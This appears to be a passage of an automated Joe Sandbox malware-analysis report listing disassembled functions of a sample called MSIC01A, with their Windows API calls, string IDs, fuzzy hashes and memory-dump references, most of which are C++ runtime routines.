                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                        • API String ID: 3103716676-1405518554
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F336D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                          • Part of subcall function 00F336D0: _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00F33CA8
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D01
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D7A
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00F33EB1
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F33F34
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F33F7B
                                                                                                                                                                        Strings
                                                                                                                                                                        • NtQueryInformationProcess, xrefs: 00F33CA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                        • String ID: NtQueryInformationProcess
                                                                                                                                                                        • API String ID: 566592816-2781105232
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,40000022,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,72A902E8,?,?,?), ref: 00F342D2
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,72A902E8,?,?,?), ref: 00F342F3
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34326
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34337
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34355
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34371
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1424318461-0
                                                                                                                                                                        • Opcode ID: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                        • Instruction ID: 22d7f7f69cf39c90cfcec02d88a68a9c1fa73a787f58570ac840598d7a3d1efd
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                        • Instruction Fuzzy Hash: E9819E71E006099FDB14DFA8D985BAEBBB5FB48320F244229E925F73D0D770B9409B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00F526F8
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52786
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F527B0
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F527F8
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52812
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F52838
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F52875
                                                                                                                                                                        • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00F52892
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3603178046-0
                                                                                                                                                                        • Opcode ID: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                        • Instruction ID: 3e72a4db479708860f5deb3043dc3c92a3b20532f8d16fca13cf0b3ea7bbddd7
                                                                                                                                                                        • Opcode Fuzzy Hash: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E71A732D002099FDF619FA4DC85AEE7BB5EF4B362F18021AEE04A7151D735C848E760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00F521A3
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F521CF
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00F5220E
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5222B
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00F5226A
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F52287
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F522C9
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F522EC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                        • Opcode ID: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                        • Instruction ID: 3744f145cd87e835538b775c13bbe67b4f70199aaa94301ab7e04887710d0381
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                        • Instruction Fuzzy Hash: C951C37290020AAFEB605F64CC45FAF7BA9EF46752F114228FF15E6150D734CD18ABA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000044,00000000,72A902E8,?,00000000), ref: 00F386F9
                                                                                                                                                                        • __Getctype.LIBCPMT ref: 00F3877B
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F387E4
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2372200979-0
                                                                                                                                                                        • Opcode ID: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                        • Instruction ID: b5f8295f726968265ab1a5141a1f251ef31af0b8b19667028acd7231cf5040b2
                                                                                                                                                                        • Opcode Fuzzy Hash: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3861C471C00748DFDB11CF68C9407AABBF0EF14364F148159E845AB291EB78AE45EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000018,00000000,72A902E8,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00F39342
                                                                                                                                                                        • __Getctype.LIBCPMT ref: 00F393BD
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F393F8
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2372200979-0
                                                                                                                                                                        • Opcode ID: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                        • Instruction ID: 6618cf343641e494afb155895f4482d801b8f96dd2edf06979c0a09ab6a6c6c3
                                                                                                                                                                        • Opcode Fuzzy Hash: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0F51BFB1D08209DFCB11DF68C844BAEBBF4EF14724F148159E845AB391D7B4AA40EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F53F57
                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00F53F5F
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F53FE8
                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F54013
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F54068
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00F67408,00F63841,0000000C,?,00000000,00000000,?,00F67632,00000021,FlsSetValue,00F7BD58,00F7BD60,?), ref: 00F673BC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B531
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B54F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B577
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000000C,00000000,72A902E8,?,00000000,00000000), ref: 00F3B5CF
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3B6B7
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B6E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3931714976-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B731
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B74F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B777
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,00000000,72A902E8,?,00000000,00000000), ref: 00F3B7CF
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3B863
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B88D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3931714976-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00F5596F,00F54900,00F5358F), ref: 00F55986
                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F55994
                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F559AD
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00F5596F,00F54900,00F5358F), ref: 00F559FF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,URL,00000000,?,72A902E8,?,00000004), ref: 00F33294
                                                                                                                                                                        • MoveFileW.KERNEL32(?,00000000), ref: 00F3354A
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F33592
                                                                                                                                                                          • Part of subcall function 00F31A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00F31AF7
                                                                                                                                                                          • Part of subcall function 00F31A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00F31B7D
                                                                                                                                                                          • Part of subcall function 00F32E60: LocalFree.KERNEL32(?,72A902E8,?,?,00F73C40,000000FF,?,00F31242,72A902E8,?,?,00F73C75,000000FF), ref: 00F32EB1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                        • String ID: URL$url
                                                                                                                                                                        • API String ID: 853893950-346267919
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00F74215,000000FF), ref: 00F3381A
                                                                                                                                                                          • Part of subcall function 00F32310: GetProcessHeap.KERNEL32 ref: 00F32365
                                                                                                                                                                          • Part of subcall function 00F346F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00F33778,-00000010,?,?,?,00F74215,000000FF), ref: 00F34736
                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00F74215,000000FF), ref: 00F337DB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                        • String ID: ntdll.dll
                                                                                                                                                                        • API String ID: 3941625479-2227199552
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F31A20: LocalFree.KERNEL32(?), ref: 00F31A42
                                                                                                                                                                          • Part of subcall function 00F53E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F31434,?,?,00F3D341,00F31434,00F88B5C,?,00F31434,?,00000000), ref: 00F53EBA
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(72A902E8,72A902E8,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                          • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                          • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
